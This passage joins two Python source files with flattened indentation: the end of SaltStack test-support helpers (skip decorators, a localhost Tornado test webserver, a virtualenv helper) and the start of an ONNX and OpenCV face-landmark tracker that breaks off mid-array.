reason = "This test does not run on {}={}".format(
kw, grains.get(kw)
)
raise SkipTest(reason)
else:
if str(grains.get(kw)).lower() == str(value).lower():
if reason is None:
reason = "This test does not run on {}={}, got {}".format(
kw, value, grains.get(kw)
)
raise SkipTest(reason)
return caller(cls)
return wrapper
return decorator
def _check_required_sminion_attributes(sminion_attr, *required_items):
"""
:param sminion_attr: The name of the sminion attribute to check, such as 'functions' or 'states'
:param required_items: The items that must be part of the designated sminion attribute for the decorated test
:return The packages that are not available
"""
# Late import
from tests.support.sminion import create_sminion
required_salt_items = set(required_items)
sminion = create_sminion(minion_id="runtests-internal-sminion")
available_items = list(getattr(sminion, sminion_attr))
not_available_items = set()
name = "__not_available_{items}s__".format(items=sminion_attr)
if not hasattr(sminion, name):
setattr(sminion, name, set())
cached_not_available_items = getattr(sminion, name)
for not_available_item in cached_not_available_items:
if not_available_item in required_salt_items:
not_available_items.add(not_available_item)
required_salt_items.remove(not_available_item)
for required_item_name in required_salt_items:
search_name = required_item_name
if "." not in search_name:
search_name += ".*"
if not fnmatch.filter(available_items, search_name):
not_available_items.add(required_item_name)
cached_not_available_items.add(required_item_name)
return not_available_items
def requires_salt_states(*names):
"""
Makes sure the passed salt state is available. Skips the test if not
.. versionadded:: 3000
"""
not_available = _check_required_sminion_attributes("states", *names)
def decorator(caller):
if inspect.isclass(caller):
# We're decorating a class
old_setup = getattr(caller, "setUp", None)
def setUp(self, *args, **kwargs):
if not_available:
raise SkipTest("Unavailable salt states: {}".format(*not_available))
if old_setup is not None:
old_setup(self, *args, **kwargs)
caller.setUp = setUp
return caller
# We're simply decorating functions
@functools.wraps(caller)
def wrapper(cls):
if not_available:
raise SkipTest("Unavailable salt states: {}".format(*not_available))
return caller(cls)
return wrapper
return decorator
def requires_salt_modules(*names):
"""
Makes sure the passed salt module is available. Skips the test if not
.. versionadded:: 0.5.2
"""
not_available = _check_required_sminion_attributes("functions", *names)
def decorator(caller):
if inspect.isclass(caller):
# We're decorating a class
old_setup = getattr(caller, "setUp", None)
def setUp(self, *args, **kwargs):
if not_available:
raise SkipTest(
"Unavailable salt modules: {}".format(*not_available)
)
if old_setup is not None:
old_setup(self, *args, **kwargs)
caller.setUp = setUp
return caller
# We're simply decorating functions
@functools.wraps(caller)
def wrapper(cls):
if not_available:
raise SkipTest("Unavailable salt modules: {}".format(*not_available))
return caller(cls)
return wrapper
return decorator
def skip_if_binaries_missing(*binaries, **kwargs):
import salt.utils.path
if len(binaries) == 1:
if isinstance(binaries[0], (list, tuple, set, frozenset)):
binaries = binaries[0]
check_all = kwargs.pop("check_all", False)
message = kwargs.pop("message", None)
if kwargs:
raise RuntimeError(
"The only supported keyword argument is 'check_all' and "
"'message'. Invalid keyword arguments: {0}".format(", ".join(kwargs.keys()))
)
if check_all:
for binary in binaries:
if salt.utils.path.which(binary) is None:
return skip(
"{0}The {1!r} binary was not found".format(
message and "{0}. ".format(message) or "", binary
)
)
elif salt.utils.path.which_bin(binaries) is None:
return skip(
"{0}None of the following binaries was found: {1}".format(
message and "{0}. ".format(message) or "", ", ".join(binaries)
)
)
return _id
def skip_if_not_root(func):
# Late import
from tests.support.runtests import RUNTIME_VARS
if RUNTIME_VARS.PYTEST_SESSION:
setattr(func, "__skip_if_not_root__", True)
if not sys.platform.startswith("win"):
if os.getuid() != 0:
func.__unittest_skip__ = True
func.__unittest_skip_why__ = (
"You must be logged in as root to run this test"
)
else:
current_user = salt.utils.win_functions.get_current_user()
if current_user != "SYSTEM":
if not salt.utils.win_functions.is_admin(current_user):
func.__unittest_skip__ = True
func.__unittest_skip_why__ = (
"You must be logged in as an Administrator to run this test"
)
return func
def repeat(caller=None, condition=True, times=5):
"""
Repeat a test X amount of times until the first failure.
.. code-block:: python
class MyTestCase(TestCase):
@repeat
def test_sometimes_works(self):
pass
"""
if caller is None:
return functools.partial(repeat, condition=condition, times=times)
if isinstance(condition, bool) and condition is False:
# Don't even decorate
return caller
elif callable(condition):
if condition() is False:
# Don't even decorate
return caller
if inspect.isclass(caller):
attrs = [n for n in dir(caller) if n.startswith("test_")]
for attrname in attrs:
try:
function = getattr(caller, attrname)
if not inspect.isfunction(function) and not inspect.ismethod(function):
continue
setattr(
caller,
attrname,
repeat(caller=function, condition=condition, times=times),
)
except Exception as exc: # pylint: disable=broad-except
log.exception(exc)
continue
return caller
@functools.wraps(caller)
def wrap(cls):
result = None
for attempt in range(1, times + 1):
log.info("%s test run %d of %s times", cls, attempt, times)
caller(cls)
return cls
return wrap
def http_basic_auth(login_cb=lambda username, password: False):
"""
A crude decorator to force a handler to request HTTP Basic Authentication
Example usage:
.. code-block:: python
@http_basic_auth(lambda u, p: u == 'foo' and p == 'bar')
class AuthenticatedHandler(salt.ext.tornado.web.RequestHandler):
pass
"""
def wrapper(handler_class):
def wrap_execute(handler_execute):
def check_auth(handler, kwargs):
auth = handler.request.headers.get("Authorization")
if auth is None or not auth.startswith("Basic "):
# No username/password entered yet, we need to return a 401
# and set the WWW-Authenticate header to request login.
handler.set_status(401)
handler.set_header("WWW-Authenticate", "Basic realm=Restricted")
else:
# Strip the 'Basic ' from the beginning of the auth header
# leaving the base64-encoded secret
username, password = base64.b64decode(auth[6:]).split(":", 1)
if login_cb(username, password):
# Authentication successful
return
else:
# Authentication failed
handler.set_status(403)
handler._transforms = []
handler.finish()
def _execute(self, transforms, *args, **kwargs):
check_auth(self, kwargs)
return handler_execute(self, transforms, *args, **kwargs)
return _execute
handler_class._execute = wrap_execute(handler_class._execute)
return handler_class
return wrapper
def generate_random_name(prefix, size=6):
"""
Generates a random name by combining the provided prefix with a randomly generated
ascii string.
.. versionadded:: 2018.3.0
prefix
The string to prefix onto the randomly generated ascii string.
size
The number of characters to generate. Default: 6.
"""
salt.utils.versions.warn_until_date(
"20220101",
"Please replace your call 'generate_random_name({0})' with 'random_string({0}, lowercase=False)' as "
"'generate_random_name' will be removed after {{date}}".format(prefix),
)
return random_string(prefix, size=size, lowercase=False)
def random_string(prefix, size=6, uppercase=True, lowercase=True, digits=True):
"""
Generates a random string.
..versionadded: 3001
Args:
prefix(str): The prefix for the random string
size(int): The size of the random string
uppercase(bool): If true, include uppercased ascii chars in choice sample
lowercase(bool): If true, include lowercased ascii chars in choice sample
digits(bool): If true, include digits in choice sample
Returns:
str: The random string
"""
if not any([uppercase, lowercase, digits]):
raise RuntimeError(
"At least one of 'uppercase', 'lowercase' or 'digits' needs to be true"
)
choices = []
if uppercase:
choices.extend(string.ascii_uppercase)
if lowercase:
choices.extend(string.ascii_lowercase)
if digits:
choices.extend(string.digits)
return prefix + "".join(random.choice(choices) for _ in range(size))
class Webserver(object):
"""
Starts a tornado webserver on 127.0.0.1 on a random available port
USAGE:
.. code-block:: python
from tests.support.helpers import Webserver
webserver = Webserver('/path/to/web/root')
webserver.start()
webserver.stop()
"""
def __init__(self, root=None, port=None, wait=5, handler=None):
"""
root
Root directory of webserver. If not passed, it will default to the
location of the base environment of the integration suite's file
roots (tests/integration/files/file/base/)
port
Port on which to listen. If not passed, a random one will be chosen
at the time the start() function is invoked.
wait : 5
Number of seconds to wait for the socket to be open before raising
an exception
handler
Can be used to use a subclass of tornado.web.StaticFileHandler,
such as when enforcing authentication with the http_basic_auth
decorator.
"""
if port is not None and not isinstance(port, six.integer_types):
raise ValueError("port must be an integer")
if root is None:
root = RUNTIME_VARS.BASE_FILES
try:
self.root = os.path.realpath(root)
except AttributeError:
raise ValueError("root must be a string")
self.port = port
self.wait = wait
self.handler = (
handler if handler is not None else salt.ext.tornado.web.StaticFileHandler
)
self.web_root = None
def target(self):
"""
Threading target which stands up the tornado application
"""
self.ioloop = salt.ext.tornado.ioloop.IOLoop()
self.ioloop.make_current()
if self.handler == salt.ext.tornado.web.StaticFileHandler:
self.application = salt.ext.tornado.web.Application(
[(r"/(.*)", self.handler, {"path": self.root})]
)
else:
self.application = salt.ext.tornado.web.Application(
[(r"/(.*)", self.handler)]
)
self.application.listen(self.port)
self.ioloop.start()
@property
def listening(self):
if self.port is None:
return False
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
return sock.connect_ex(("127.0.0.1", self.port)) == 0
def url(self, path):
"""
Convenience function which, given a file path, will return a URL that
points to that path. If the path is relative, it will just be appended
to self.web_root.
"""
if self.web_root is None:
raise RuntimeError("Webserver instance has not been started")
err_msg = (
"invalid path, must be either a relative path or a path "
"within {0}".format(self.root)
)
try:
relpath = (
path if not os.path.isabs(path) else os.path.relpath(path, self.root)
)
if relpath.startswith(".." + os.sep):
raise ValueError(err_msg)
return "/".join((self.web_root, relpath))
except AttributeError:
raise ValueError(err_msg)
def start(self):
"""
Starts the webserver
"""
if self.port is None:
self.port = get_unused_localhost_port()
self.web_root = "http://127.0.0.1:{0}".format(self.port)
self.server_thread = threading.Thread(target=self.target)
self.server_thread.daemon = True
self.server_thread.start()
for idx in range(self.wait + 1):
if self.listening:
break
if idx != self.wait:
time.sleep(1)
else:
raise Exception(
"Failed to start tornado webserver on 127.0.0.1:{0} within "
"{1} seconds".format(self.port, self.wait)
)
def stop(self):
"""
Stops the webserver
"""
self.ioloop.add_callback(self.ioloop.stop)
self.server_thread.join()
class SaveRequestsPostHandler(salt.ext.tornado.web.RequestHandler):
"""
Save all requests sent to the server.
"""
received_requests = []
def post(self, *args): # pylint: disable=arguments-differ
"""
Handle the post
"""
self.received_requests.append(self.request)
def data_received(self): # pylint: disable=arguments-differ
"""
Streaming not used for testing
"""
raise NotImplementedError()
class MirrorPostHandler(salt.ext.tornado.web.RequestHandler):
"""
Mirror a POST body back to the client
"""
def post(self, *args): # pylint: disable=arguments-differ
"""
Handle the post
"""
body = self.request.body
log.debug("Incoming body: %s Incoming args: %s", body, args)
self.write(body)
def data_received(self): # pylint: disable=arguments-differ
"""
Streaming not used for testing
"""
raise NotImplementedError()
def dedent(text, linesep=os.linesep):
"""
A wrapper around textwrap.dedent that also sets line endings.
"""
linesep = salt.utils.stringutils.to_unicode(linesep)
unicode_text = textwrap.dedent(salt.utils.stringutils.to_unicode(text))
clean_text = linesep.join(unicode_text.splitlines())
if unicode_text.endswith("\n"):
clean_text += linesep
if not isinstance(text, six.text_type):
return salt.utils.stringutils.to_bytes(clean_text)
return clean_text
class PatchedEnviron(object):
def __init__(self, **kwargs):
self.cleanup_keys = kwargs.pop("__cleanup__", ())
self.kwargs = kwargs
self.original_environ = None
def __enter__(self):
self.original_environ = os.environ.copy()
for key in self.cleanup_keys:
os.environ.pop(key, None)
# Make sure there are no unicode characters in the self.kwargs if we're
# on Python 2. These are being added to `os.environ` and causing
# problems
if sys.version_info < (3,):
kwargs = self.kwargs.copy()
clean_kwargs = {}
for k in self.kwargs:
key = k
if isinstance(key, six.text_type):
key = key.encode("utf-8")
if isinstance(self.kwargs[k], six.text_type):
kwargs[k] = kwargs[k].encode("utf-8")
clean_kwargs[key] = kwargs[k]
self.kwargs = clean_kwargs
os.environ.update(**self.kwargs)
return self
def __exit__(self, *args):
os.environ.clear()
os.environ.update(self.original_environ)
patched_environ = PatchedEnviron
class VirtualEnv(object):
def __init__(self, venv_dir=None):
self.venv_dir = venv_dir or tempfile.mkdtemp(dir=RUNTIME_VARS.TMP)
if salt.utils.platform.is_windows():
self.venv_python = os.path.join(self.venv_dir, "Scripts", "python.exe")
else:
self.venv_python = os.path.join(self.venv_dir, "bin", "python")
def __enter__(self):
try:
self._create_virtualenv()
except subprocess.CalledProcessError:
raise AssertionError("Failed to create virtualenv")
return self
def __exit__(self, *args):
shutil.rmtree(self.venv_dir, ignore_errors=True)
def install(self, *args):
subprocess.check_call([self.venv_python, "-m", "pip", "install"] + list(args))
def _get_real_python(self):
"""
The reason why the virtualenv creation is proxied by this function is mostly
because under windows, we can't seem to properly create a virtualenv off of
another virtualenv(we can on linux) and also because, we really don't want to
test virtualenv creation off of another virtualenv, we want a virtualenv created
from the original python.
Also, on windows, we must also point to the virtualenv binary outside the existing
virtualenv because it will fail otherwise
"""
try:
if salt.utils.platform.is_windows():
return os.path.join(sys.real_prefix, os.path.basename(sys.executable))
else:
python_binary_names = [
"python{}.{}".format(*sys.version_info),
"python{}".format(*sys.version_info),
"python",
]
for binary_name in python_binary_names:
python = os.path.join(sys.real_prefix, "bin", binary_name)
if os.path.exists(python):
break
else:
raise AssertionError(
"Couldn't find a python binary name under '{}' matching: {}".format(
os.path.join(sys.real_prefix, "bin"), python_binary_names
)
)
return python
except AttributeError:
return sys.executable
def _create_virtualenv(self):
sminion = create_sminion()
sminion.functions.virtualenv.create(
self.venv_dir, python=self._get_real_python()
)
|
tracker.py
|
import os
import numpy as np
import math
import cv2
import onnxruntime
import time
import queue
import threading
import copy
from retinaface import RetinaFaceDetector
from remedian import remedian
def resolve(name):
f = os.path.join(os.path.dirname(__file__), name)
return f
def clamp_to_im(pt, w, h):
x = pt[0]
y = pt[1]
if x < 0:
x = 0
if y < 0:
y = 0
if x >= w:
x = w-1
if y >= h:
y = h-1
return (int(x), int(y+1))
def rotate(origin, point, a):
a = -a
ox, oy = origin
px, py = point
qx = ox + math.cos(a) * (px - ox) - math.sin(a) * (py - oy)
qy = oy + math.sin(a) * (px - ox) + math.cos(a) * (py - oy)
return qx, qy
def angle(p1, p2):
p1 = np.array(p1)
p2 = np.array(p2)
a = np.arctan2(*(p2 - p1)[::-1])
return (a % (2 * np.pi))
def compensate(p1, p2):
a = angle(p1, p2)
return rotate(p1, p2, a), a
def rotate_image(image, a, center):
(h, w) = image.shape[:2]
a = np.rad2deg(a)
M = cv2.getRotationMatrix2D((center[0], center[1]), a, 1.0)
rotated = cv2.warpAffine(image, M, (w, h))
return rotated
def intersects(r1, r2, amount=0.3):
area1 = r1[2] * r1[3]
area2 = r2[2] * r2[3]
inter = 0.0
total = area1 + area2
r1_x1, r1_y1, w, h = r1
r1_x2 = r1_x1 + w
r1_y2 = r1_y1 + h
r2_x1, r2_y1, w, h = r2
r2_x2 = r2_x1 + w
r2_y2 = r2_y1 + h
left = max(r1_x1, r2_x1)
right = min(r1_x2, r2_x2)
top = max(r1_y1, r2_y1)
bottom = min(r1_y2, r2_y2)
if left < right and top < bottom:
inter = (right - left) * (bottom - top)
total -= inter
if inter / total >= amount:
return True
return False
#return not (r1_x1 > r2_x2 or r1_x2 < r2_x1 or r1_y1 > r2_y2 or r1_y2 < r2_y1)
def group_rects(rects):
rect_groups = {}
for rect in rects:
rect_groups[str(rect)] = [-1, -1, []]
group_id = 0
for i, rect in enumerate(rects):
name = str(rect)
group = group_id
group_id += 1
if rect_groups[name][0] < 0:
rect_groups[name] = [group, -1, []]
else:
group = rect_groups[name][0]
for j, other_rect in enumerate(rects):
if i == j:
continue;
inter = intersects(rect, other_rect)
if intersects(rect, other_rect):
rect_groups[str(other_rect)] = [group, -1, []]
return rect_groups
def logit(p, factor=16.0):
if p >= 1.0:
p = 0.9999999
if p <= 0.0:
p = 0.0000001
p = p/(1-p)
return float(np.log(p)) / float(factor)
def matrix_to_quaternion(m):
t = 0.0
q = [0.0, 0.0, 0, 0.0]
if m[2,2] < 0:
if m[0,0] > m[1,1]:
t = 1 + m[0,0] - m[1,1] - m[2,2]
q = [t, m[0,1]+m[1,0], m[2,0]+m[0,2], m[1,2]-m[2,1]]
else:
t = 1 - m[0,0] + m[1,1] - m[2,2]
q = [m[0,1]+m[1,0], t, m[1,2]+m[2,1], m[2,0]-m[0,2]]
else:
if m[0,0] < -m[1,1]:
t = 1 - m[0,0] - m[1,1] + m[2,2]
q = [m[2,0]+m[0,2], m[1,2]+m[2,1], t, m[0,1]-m[1,0]]
else:
t = 1 + m[0,0] + m[1,1] + m[2,2]
q = [m[1,2]-m[2,1], m[2,0]-m[0,2], m[0,1]-m[1,0], t]
q = np.array(q, np.float32) * 0.5 / np.sqrt(t)
return q
def worker_thread(session, frame, input, crop_info, queue, input_name, idx, tracker):
output = session.run([], {input_name: input})[0]
conf, lms = tracker.landmarks(output[0], crop_info)
if conf > tracker.threshold:
eye_state = tracker.get_eye_state(frame, lms, single=True)
queue.put((session, conf, (lms, eye_state), crop_info, idx))
else:
queue.put((session,))
class Feature():
def __init__(self, threshold=0.15, alpha=0.2, hard_factor=0.15, decay=0.001):
self.median = remedian()
self.min = None
self.max = None
self.hard_min = None
self.hard_max = None
self.threshold = threshold
self.alpha = alpha
self.hard_factor = hard_factor
self.decay = decay
self.last = 0
def update(self, x):
new = self.update_state(x)
filtered = self.last * self.alpha + new * (1 - self.alpha)
self.last = filtered
return filtered
def update_state(self, x):
self.median + x
median = self.median.median()
if self.min is None:
if x < median and (median - x) / median > self.threshold:
self.min = x
self.hard_min = self.min + self.hard_factor * (median - self.min)
return -1
return 0
else:
if x < self.min:
self.min = x
self.hard_min = self.min + self.hard_factor * (median - self.min)
return -1
if self.max is None:
if x > median and (x - median) / median > self.threshold:
self.max = x
self.hard_max = self.max - self.hard_factor * (self.max - median)
return 1
return 0
else:
if x > self.max:
self.max = x
self.hard_max = self.max - self.hard_factor * (self.max - median)
return 1
if self.min < self.hard_min:
self.min = self.hard_min * self.decay + self.min * (1 - self.decay)
if self.max > self.hard_max:
self.max = self.hard_max * self.decay + self.max * (1 - self.decay)
if x < median:
return - (1 - (x - self.min) / (median - self.min))
elif x > median:
return (x - median) / (self.max - median)
return 0
class FeatureExtractor():
def __init__(self):
self.eye_l = Feature()
self.eye_r = Feature()
self.eyebrow_updown_l = Feature()
self.eyebrow_updown_r = Feature()
self.eyebrow_quirk_l = Feature(threshold=0.05)
self.eyebrow_quirk_r = Feature(threshold=0.05)
self.eyebrow_steepness_l = Feature(threshold=0.05)
self.eyebrow_steepness_r = Feature(threshold=0.05)
self.mouth_corner_updown_l = Feature()
self.mouth_corner_updown_r = Feature()
self.mouth_corner_inout_l = Feature(threshold=0.02)
self.mouth_corner_inout_r = Feature(threshold=0.02)
self.mouth_open = Feature()
self.mouth_wide = Feature(threshold=0.02)
def align_points(self, a, b, pts):
a = tuple(a)
b = tuple(b)
alpha = angle(a, b)
alpha = np.rad2deg(alpha)
if alpha >= 90:
alpha = - (alpha - 180)
if alpha <= -90:
alpha = - (alpha + 180)
alpha = np.deg2rad(alpha)
aligned_pts = []
for pt in pts:
aligned_pts.append(np.array(rotate(a, pt, alpha)))
return alpha, np.array(aligned_pts)
def update(self, pts):
features = {}
norm_distance_x = np.mean([pts[0, 0] - pts[16, 0], pts[1, 0] - pts[15, 0]])
norm_distance_y = np.mean([pts[27, 1] - pts[28, 1], pts[28, 1] - pts[29, 1], pts[29, 1] - pts[30, 1]])
a1, f_pts = self.align_points(pts[42], pts[45], pts[[43, 44, 47, 46]])
f = np.clip((np.mean([f_pts[0,1], f_pts[1,1]]) - np.mean([f_pts[2,1], f_pts[3,1]])) / norm_distance_y, 0, None)
features["eye_l"] = self.eye_l.update(f)
a2, f_pts = self.align_points(pts[36], pts[39], pts[[37, 38, 41, 40]])
f = np.clip((np.mean([f_pts[0,1], f_pts[1,1]]) - np.mean([f_pts[2,1], f_pts[3,1]])) / norm_distance_y, 0, None)
features["eye_r"] = self.eye_r.update(f)
a3, _ = self.align_points(pts[0], pts[16], [])
a4, _ = self.align_points(pts[31], pts[35], [])
norm_angle = np.mean(list(map(np.rad2deg, [a1, a2, a3, a4])))
a, f_pts = self.align_points(pts[22], pts[26], pts[[22, 23, 24, 25, 26]])
features["eyebrow_steepness_l"] = self.eyebrow_steepness_l.update(-np.rad2deg(a) - norm_angle)
f = (np.mean([pts[22, 1], pts[26, 1]]) - pts[27, 1]) / norm_distance_y
features["eyebrow_updown_l"] = self.eyebrow_updown_l.update(f)
f = np.max(np.abs(np.array(f_pts[1:4]) - f_pts[0, 1])) / norm_distance_y
features["eyebrow_quirk_l"] = self.eyebrow_quirk_l.update(f)
a, f_pts = self.align_points(pts[17], pts[21], pts[[17, 18, 19, 20, 21]])
features["eyebrow_steepness_r"] = self.eyebrow_steepness_r.update(np.rad2deg(a) - norm_angle)
f = (np.mean([pts[17, 1], pts[21, 1]]) - pts[27, 1]) / norm_distance_y
features["eyebrow_updown_r"] = self.eyebrow_updown_r.update(f)
f = np.max(np.abs(np.array(f_pts[1:4]) - f_pts[0, 1])) / norm_distance_y
features["eyebrow_quirk_r"] = self.eyebrow_quirk_r.update(f)
upper_mouth_line = np.mean([pts[49, 1], pts[50, 1], pts[51, 1]])
center_line = np.mean([pts[50, 0], pts[60, 0], pts[27, 0], pts[30, 0], pts[64, 0], pts[55, 0]])
f = (upper_mouth_line - pts[62, 1]) / norm_distance_y
features["mouth_corner_updown_l"] = self.mouth_corner_updown_l.update(f)
f = abs(center_line - pts[62, 0]) / norm_distance_x
features["mouth_corner_inout_l"] = self.mouth_corner_inout_l.update(f)
f = (upper_mouth_line - pts[58, 1]) / norm_distance_y
features["mouth_corner_updown_r"] = self.mouth_corner_updown_r.update(f)
f = abs(center_line - pts[58, 0]) / norm_distance_x
features["mouth_corner_inout_r"] = self.mouth_corner_inout_r.update(f)
f = (np.mean([pts[59, 1], pts[60, 1], pts[61, 1]]) - np.mean([pts[65, 1], pts[64, 1], pts[63, 1]])) / norm_distance_y
features["mouth_open"] = self.mouth_open.update(f)
f = abs(pts[58, 0] - pts[62, 0]) / norm_distance_x
features["mouth_wide"] = self.mouth_wide.update(f)
return features
class FaceInfo():
def __init__(self, id, tracker):
self.id = id
self.frame_count = -1
self.tracker = tracker
self.contour_pts = [0,1,8,15,16,27,28,29,30,31,32,33,34,35,36,39,42,45]
self.face_3d = copy.copy(self.tracker.face_3d)
self.reset()
self.alive = False
self.coord = None
self.base_scale_v = self.tracker.face_3d[27:30, 1] - self.tracker.face_3d[28:31, 1]
self.base_scale_h = np.abs(self.tracker.face_3d[[0, 36, 42], 0] - self.tracker.face_3d[[16, 39, 45], 0])
self.limit_3d_adjustment = True
self.update_count_delta = 75.
self.update_count_max = 7500.
def reset(self):
self.alive = False
self.conf = None
self.lms = None
self.eye_state = None
self.rotation = None
self.translation = None
self.success = None
self.quaternion = None
self.euler = None
self.pnp_error = None
self.pts_3d = None
self.eye_blink = None
self.bbox = None
self.pnp_error = 0
self.features = FeatureExtractor()
self.current_features = {}
self.contour = np.zeros((21,3))
self.update_counts = np.zeros((66,2))
self.update_contour()
self.fail_count = 0
def update(self, result, coord, frame_count):
self.frame_count = frame_count
if result is None:
self.reset()
else:
self.conf, (self.lms, self.eye_state) = result
self.coord = coord
self.alive = True
def update_contour(self):
self.contour = np.array(self.face_3d[self.contour_pts])
def normalize_pts3d(self, pts_3d):
# Calculate angle using nose
pts_3d[:, 0:2] -= pts_3d[30, 0:2]
alpha = angle(pts_3d[30, 0:2], pts_3d[27, 0:2])
alpha -= np.deg2rad(90)
R = np.matrix([[np.cos(alpha), -np.sin(alpha)], [np.sin(alpha), np.cos(alpha)]])
pts_3d[:, 0:2] = (pts_3d - pts_3d[30])[:, 0:2].dot(R) + pts_3d[30, 0:2]
# Vertical scale
pts_3d[:, 1] /= np.mean((pts_3d[27:30, 1] - pts_3d[28:31, 1]) / self.base_scale_v)
# Horizontal scale
pts_3d[:, 0] /= np.mean(np.abs(pts_3d[[0, 36, 42], 0] - pts_3d[[16, 39, 45], 0]) / self.base_scale_h)
return pts_3d
def adjust_3d(self):
if self.conf < 0.4 or self.pnp_error > 300:
return
max_runs = 1
eligible = np.delete(np.arange(0, 66), [30])
changed_any = False
update_type = -1
d_o = np.ones((66,))
d_c = np.ones((66,))
for runs in range(max_runs):
r = 1.0 + np.random.random_sample((66,3)) * 0.02 - 0.01
r[30, :] = 1.0
if self.euler[0] > -165 and self.euler[0] < 145:
continue
elif self.euler[1] > -10 and self.euler[1] < 20:
r[:, 2] = 1.0
update_type = 0
else:
r[:, 0:2] = 1.0
if self.euler[2] > 120 or self.euler[2] < 60:
continue
# Enable only one side of the points, depending on direction
elif self.euler[1] < -10:
update_type = 1
r[[0, 1, 2, 3, 4, 5, 6, 7, 17, 18, 19, 20, 21, 31, 32, 36, 37, 38, 39, 40, 41, 48, 49, 56, 57, 58, 59, 65], 2] = 1.0
eligible = [8, 9, 10, 11, 12, 13, 14, 15, 16, 22, 23, 24, 25, 26, 27, 28, 29, 33, 34, 35, 42, 43, 44, 45, 46, 47, 50, 51, 52, 53, 54, 55, 60, 61, 62, 63, 64]
else:
update_type = 1
r[[9, 10, 11, 12, 13, 14, 15, 16, 22, 23, 24, 25, 26, 34, 35, 42, 43, 44, 45, 46, 47, 51, 52, 53, 54, 61, 62, 63], 2] = 1.0
eligible = [0, 1, 2, 3, 4, 5, 6, 7, 8, 17, 18, 19, 20, 21, 27, 28, 29, 31, 32, 33, 36, 37, 38, 39, 40, 41, 48, 49, 50, 55, 56, 57, 58, 59, 60, 64, 65]
if self.limit_3d_adjustment:
eligible = np.nonzero(self.update_counts[:, update_type] < self.update_counts[:, abs(update_type - 1)] + self.update_count_delta)[0]
if eligible.shape[0] <= 0:
break
if runs == 0:
updated = copy.copy(self.face_3d[0:66])
o_projected = np.ones((66,2))
o_projected[eligible] = np.squeeze(np.array(cv2.projectPoints(self.face_3d[eligible], self.rotation, self.translation, self.tracker.camera, self.tracker.dist_coeffs)[0]), 1)
c = updated * r
c_projected = np.zeros((66,2))
c_projected[eligible] = np.squeeze(np.array(cv2.projectPoints(c[eligible], self.rotation, self.translation, self.tracker.camera, self.tracker.dist_coeffs)[0]), 1)
changed = False
d_o[eligible] = np.linalg.norm(o_projected[eligible] - self.lms[eligible, 0:2], axis=1)
d_c[eligible] = np.linalg.norm(c_projected[eligible] - self.lms[eligible, 0:2], axis=1)
indices = np.nonzero(d_c < d_o)[0]
if indices.shape[0] > 0:
if self.limit_3d_adjustment:
indices = np.intersect1d(indices, eligible)
if indices.shape[0] > 0:
self.update_counts[indices, update_type] += 1
updated[indices] = c[indices]
o_projected[indices] = c_projected[indices]
changed = True
changed_any = changed_any or changed
if not changed:
break
if changed_any:
# Update weighted by point confidence
weights = np.zeros((66,3))
weights[:, :] = self.lms[0:66, 2:3]
weights[weights > 0.7] = 1.0
weights = 1.0 - weights
update_indices = np.arange(0, 66)
if self.limit_3d_adjustment:
update_indices = np.nonzero(self.update_counts[:, update_type] <= self.update_count_max)[0]
self.face_3d[update_indices] = self.face_3d[update_indices] * weights[update_indices] + updated[update_indices] * (1. - weights[update_indices])
self.update_contour()
self.pts_3d = self.normalize_pts3d(self.pts_3d)
self.current_features = self.features.update(self.pts_3d[:, 0:2])
self.eye_blink = []
self.eye_blink.append(1 - min(max(0, -self.current_features["eye_r"]), 1))
self.eye_blink.append(1 - min(max(0, -self.current_features["eye_l"]), 1))
class Tracker():
def __init__(self, width, height, model_type=3, threshold=0.6, max_faces=1, discard_after=5, scan_every=3, bbox_growth=0.0, max_threads=4, silent=False, model_dir=None, no_gaze=False, use_retinaface=False):
options = onnxruntime.SessionOptions()
options.inter_op_num_threads = 1
options.intra_op_num_threads = max(max_threads,4)
options.execution_mode = onnxruntime.ExecutionMode.ORT_SEQUENTIAL
options.graph_optimization_level = onnxruntime.GraphOptimizationLevel.ORT_ENABLE_ALL
options.log_severity_level = 3
self.model_type = model_type
self.models = [
"mnv3_opt_very_fast.onnx",
"mnv3_opt_fast.onnx",
"mnv3_opt_medium.onnx",
"mnv3_opt_b.onnx"
]
model = self.models[self.model_type]
model_base_path = resolve(os.path.join("models"))
if model_dir is None:
if not os.path.exists(model_base_path):
model_base_path = resolve(os.path.join("..", "models"))
else:
model_base_path = model_dir
self.retinaface = RetinaFaceDetector(model_path=os.path.join(model_base_path, "retinaface_640x640_opt.onnx"), json_path=os.path.join(model_base_path, "priorbox_640x640.json"), threads=max(max_threads,4), top_k=max_faces, res=(640, 640))
self.retinaface_scan = RetinaFaceDetector(model_path=os.path.join(model_base_path, "retinaface_640x640_opt.onnx"), json_path=os.path.join(model_base_path, "priorbox_640x640.json"), threads=2, top_k=max_faces, res=(640, 640))
self.use_retinaface = use_retinaface
# Single face instance with multiple threads
self.session = onnxruntime.InferenceSession(os.path.join(model_base_path, model), sess_options=options)
# Multiple faces with single threads
self.sessions = []
self.max_workers = min(max_threads, max_faces)
extra_threads = max_threads % self.max_workers
for i in range(self.max_workers):
options = onnxruntime.SessionOptions()
options.inter_op_num_threads = 1
options.intra_op_num_threads = max_threads // self.max_workers
if options.intra_op_num_threads < 1:
options.intra_op_num_threads = 1
elif i < extra_threads:
options.intra_op_num_threads += 1
options.execution_mode = onnxruntime.ExecutionMode.ORT_SEQUENTIAL
options.graph_optimization_level = onnxruntime.GraphOptimizationLevel.ORT_ENABLE_ALL
self.sessions.append(onnxruntime.InferenceSession(os.path.join(model_base_path, model), sess_options=options))
self.input_name = self.session.get_inputs()[0].name
options = onnxruntime.SessionOptions()
options.inter_op_num_threads = 1
options.intra_op_num_threads = max(max_threads,4)
options.execution_mode = onnxruntime.ExecutionMode.ORT_SEQUENTIAL
options.graph_optimization_level = onnxruntime.GraphOptimizationLevel.ORT_ENABLE_ALL
options.log_severity_level = 3
self.gaze_model = onnxruntime.InferenceSession(os.path.join(model_base_path, "mnv3_gaze32_split_opt.onnx"), sess_options=options)
options.intra_op_num_threads = 1
self.gaze_model_single = onnxruntime.InferenceSession(os.path.join(model_base_path, "mnv3_gaze32_split_opt.onnx"), sess_options=options)
self.detection = onnxruntime.InferenceSession(os.path.join(model_base_path, "mnv3_detection_opt.onnx"), sess_options=options)
self.faces = []
# Image normalization constants
self.mean = np.float32(np.array([0.485, 0.456, 0.406]))
self.std = np.float32(np.array([0.229, 0.224, 0.225]))
self.mean = self.mean / self.std
self.std = self.std * 255.0
# PnP solving
self.face_3d = np.array([
[ 0.4551769692672 , 0.300895790030204, -0.764429433974752],
[ 0.448998827123556, 0.166995837790733, -0.765143004071253],
[ 0.437431554952677, 0.022655479179981, -0.739267175112735],
